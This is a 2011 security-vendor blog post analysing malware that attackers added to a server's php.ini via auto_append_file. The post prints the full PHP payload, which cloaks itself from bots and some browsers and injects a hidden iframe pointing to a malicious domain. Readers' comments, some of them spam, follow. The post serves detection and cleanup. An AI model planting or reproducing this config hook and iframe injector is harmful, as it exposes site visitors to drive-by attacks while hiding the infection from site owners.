• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Malware Being Called From Your php.ini File

December 22, 2011David Dede

0
SHARES
FacebookTwitterSubscribe

Is your site infected with malware, and you can’t find it anywhere? It might be a good idea to search outside of your web directory, and look in your main configuration files (specially if you are on a dedicated/VPS server).

We are seeing an increased number of infected sites with malicious iframes, similar to this one:

<style type=”text/css”>#doxig {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id=”doxig” src="http://1306a95ajbr.liga4giurgiu.info/ad.jpg?2"></iframe>

These specific strings aren’t typically found anywhere in the website files, which is very concerning. We’re finding that entire servers are being compromised, and the main server php.ini file (/etc/php/php.ini) has the following setting added:

;auto_append_file = “0ff”

This simple line in the php.ini makes all the php scripts append the output of the file 0ff (/tmp/0ff) to them. So even if your files look clean, the malware is still displayed to anyone visiting the site.

This is the code of the 0ff file:

<?php
if(!@isset($_COOKIE[‘PHPSESS1D’]) &&
 !@preg_match(‘/; Yandex|; Googlebot|linux|macintosh|android|Symbian|iPhone|
Mac OS|Opera Mini|Chrome|Apple/i’,$_SERVER[‘HTTP_USER_AGENT’])) {
 echo ‘<script type="text/javascript">
 d=new Date();
 d&#46setDate(d&#46getDate()+1);
 document&#46cookie="PHPSESS1D=1; path=/; expires=" + d&#46toGMTString();
 </script>’;
 echo ‘<style type="text/css">#doxig {width: 10px;height: 10px;frameborder: no;
visibility: hidden;scrolling: no;}</style><iframe id="doxig" src="
http://1306a95ajbr&#46liga4giurgiu&#46info/ad&#46jpg?2"></iframe>’;
}

So if you are seeing those hidden iframes, try to look at your PHP and main Apache configurations.


Need help with malware? Need someone to clean your site? Sign up here: Sucuri

0
SHARES
FacebookTwitterSubscribe

Categories: Vulnerability Disclosure, Website Malware InfectionsTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Shosha

    December 25, 2011

    Yeah lol, a “vulnerability” that is a legitimate and docummented directive of PHP… If you leave your php.ini unprotected, it’s really your own fault, not phps…

  2. Anonymous

    December 27, 2011

    Anyway it’s a bad idea, most of distro’s around empty /tmp at boot by default. It will get deleted just rebooting.

  3. SomeGuy

    December 28, 2011

    How is the php.ini being modified, are you finding this happening in setups with incorrect permissions, are they being uploaded, or is another vulnerability being exploited?

  4. bilgiler

    March 7, 2012

     pratik bilgiler
    2012 pratik bilgiler
    pratik
    2013 pratik bilgiler

    thankkksss..

  5. Guest

    May 25, 2012

    It might be a good idea to search outside
    of your web directory, and look in your main configuration files. I have share this blog to my friends. That is of great utility. Thanks for
    sharing this info.

    Hire PHP Developers | Hire PHP Programmers | PHP Website Development Company

  6. adri roy

    September 7, 2012

    your thinking is really up to date and i really agree with your thinking with this matter.please write some more information in this matter.great article with useful information.
    http://www.smtrafficguru.com

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

How to Clean a Hacked Website Guide

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.